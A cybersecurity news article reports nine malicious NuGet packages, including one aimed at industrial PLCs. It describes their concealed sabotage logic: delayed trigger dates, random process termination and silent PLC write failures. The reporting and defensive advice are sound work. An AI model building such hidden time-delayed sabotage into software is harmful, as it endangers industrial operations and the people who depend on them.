Weaponized NuGet Packages Inject Time-Delayed Destructive Payloads to Attack ICS Systems

A sophisticated supply chain attack has emerged, targeting industrial control systems through compromised .NET packages.

The threat landscape shifted on November 5, 2025, when researchers identified nine malicious NuGet packages designed to inject destructive payloads into critical infrastructure environments.

Published under the NuGet alias shanhai666 between 2023 and 2024, these packages accumulated nearly 9,500 downloads before detection, establishing a significant foothold in production environments worldwide.

The threat actor employed an innovative approach that blurs the line between legitimate functionality and malicious intent.

Each package provides complete, working implementations of their advertised features, including database repository patterns, LINQ support, pagination methods, and asynchronous operations.

This 99% functional code serves as an effective smokescreen, allowing packages to pass code reviews and establish developer trust while concealing approximately 20 lines of malicious code buried within thousands of lines of legitimate implementation.

The strategy ensures packages work exactly as advertised, providing genuine value that encourages adoption and delays discovery even after the malware activates.

The most critical package, Sharp7Extend, directly targets industrial PLCs with dual sabotage mechanisms designed to compromise safety-critical systems.

This package employs both immediate random process termination and silent write failures that begin 30 to 90 minutes after installation.

The implications for manufacturing environments are severe, potentially affecting actuators, setpoints, and safety system operations.

Socket security analysts identified the malware after examining package behavior patterns and discovering the probabilistic execution logic embedded within extension methods.

Attack methodology

The attack methodology represents a fundamental shift in supply chain threat sophistication. Rather than attempting to hide completely, the attacker embedded malicious logic within C# extension methods that transparently intercept database and PLC operations.

Each database query or PLC communication operation triggers these methods automatically, which check the current date against hardcoded trigger dates ranging from August 2027 to June 2028.

Once triggered, the malware generates a random number between 1 and 100. If this number exceeds 80, a 20% probability event occurs: Process.GetCurrentProcess().Kill() executes, terminating the entire application without warning.

The Sharp7Extend write operation sabotage mechanism operates through a configurable delay system disguised as configuration-based control.

Upon installation, a random 30 to 90 minute grace period activates during which all operations function normally, allowing initial deployment testing to succeed.

Once this window closes, write operations fail silently 80% of the time by returning zero instead of actual results, creating data integrity issues without obvious error messages.

For industrial environments relying on PLC write operations to control critical systems, this represents an existential threat to operational continuity and safety. The psychological impact of this attack extends beyond immediate system failure.

The staggered activation windows mean developers who installed packages in 2024 will have moved to different projects or companies by 2027 when database malware triggers, making attribution and forensic investigation nearly impossible.

Production applications executing hundreds of queries per hour will crash within seconds, with manufacturing environments experiencing combined process termination and silent write failures that mimic intermittent hardware problems.

Organizations must immediately audit dependencies for these nine malicious packages and implement dependency scanning before merge, monitoring specifically for time-based logic, probabilistic execution patterns, and typosquats targeting industrial control libraries.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.